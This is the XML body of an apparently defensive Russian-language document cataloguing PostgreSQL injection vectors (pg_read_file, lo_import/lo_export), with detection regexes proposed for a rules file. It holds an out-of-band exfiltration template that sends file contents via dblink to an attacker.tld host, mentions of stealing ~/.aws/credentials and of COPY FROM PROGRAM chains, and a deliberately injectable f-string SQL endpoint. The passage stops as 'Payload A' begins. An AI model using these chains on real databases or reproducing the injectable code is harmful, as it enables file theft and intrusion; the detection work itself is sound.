          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cloudsqlsuperuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; на Supabase — только специальный service role при custom-конфигурации, по умолчанию закрыто. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Атака на managed-PG ограничена уровнем (1) — только относительные пути в data_dir, реалистичный максимум — `PG_VERSION` для fingerprinting.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Self-hosted (bare-metal, IaaS-VM, Kubernetes с own-managed PG) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>единственная среда, где доступны уровни (2) и (3)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Детальный разбор по провайдерам — см. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.9</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5CF8E5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C53219" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_import</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как альтернативный file-read через OID large object (другая модель привилегий, другой API; работает там, где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> недоступен).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691FB8CE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6.1, 3.6.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — chain для эксфильтрации результата </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через OOB-канал, когда HTTP-ответ невидим: обернуть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_file(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink_connect('host=...' || encode(pg_read_file(...)::bytea, 'hex') || '.attacker.tld ...')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или эквивалент через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres_fdw</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01019ADF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — RCE-цепочки: чтение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgresql.conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → расположение SSL-keys/extension-libs → подготовка к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COPY FROM PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; чтение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>~/.aws/credentials</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → cross-system pivot в облачную инфру.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359EFCEF"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pg_read_file</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_binary_file</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>app/services/judge/rules.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нет. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Рекомендация:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> расширить класс </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OOB_EXFILTRATION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (предложенный в 3.6.1) regex-ом </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\b(pg_read_file|pg_read_binary_file|pg_read_server_files)\s*\(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — добавить как третью ветку в ту же regex-проверку, что и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.6.1) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE\s+SERVER|postgres_fdw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.6.2). Базовый риск 9. В саммари 3.6 будет сводный regex со всеми четырьмя ветками (включая 3.6.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_import</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5A1ED7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5DDE05" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: System Information Functions — pg_read_file / pg_read_binary_file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1B3D55" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Predefined Roles — pg_read_server_files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130CC5B7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: File-System Level Backup (контекст data_directory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C09BD2B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>HackTricks: PostgreSQL Injection — file read (pg_read_file)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — R4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAB0398" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PortSwigger Web Security Academy: SQL injection cheat sheet — PostgreSQL section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B5CA7D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Source: src/backend/utils/adt/genfile.c (реализация pg_read_file / pg_read_binary_file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7426094E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.6.4 lo_import / lo_export — OID-based file-read и единственный write-вектор в 3.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723FE4C0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_import(path)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> копирует файл с ФС в PostgreSQL large object (returns OID), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_get(oid)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> извлекает содержимое OID как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bytea</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_export(oid, path)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> пишет LO обратно в файл на ФС. Двухшаговая семантика (OID как промежуточное состояние) — наследие исторического large-object API. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`lo_export` — единственный write-вектор во всей категории 3.6</w:t>
      </w:r>
      <w:r>
        <w:t>: 3.6.1/3.6.2/3.6.3 — read-only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18379DDA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AF70AA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/v1/orders.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D81F3A2"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2D6C91CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39223A5E"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7125FA44" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FF05E7"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4A924ADB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694E8886" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>router = APIRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D87C23" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001EFD12" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDF516A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/orders")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754319FC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def list_orders(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A48D5E7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    status: str,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4742D469"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69DBA3A6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) -&gt; list[dict]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A21F98A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746EDBA0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        f"SELECT id, total, status FROM orders WHERE status = '{status}'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEC87AD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1DF01C"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43912A1A"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33090FAC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Конкатенация </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>status</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Три колонки SELECT: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>id int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>total numeric</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>status text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. UNION-инъекция тривиальна — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>oid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> приводится к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>numeric</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bytea</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>encode()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t>, оба попадают в свои позиции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAB065B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload A — двухшаговый (отдельные запросы)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251FDF33" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Между двумя запросами OID нужно вытащить из ответа первого. Полезно для интерактивной инъекции (Burp Repeater, ручной перебор), когда payload-форма ограничена длиной (короче чем nested-вариант в Payload B), и когда атакующий хочет иметь возможность вызвать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_unlink</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для очистки следов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C27108" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
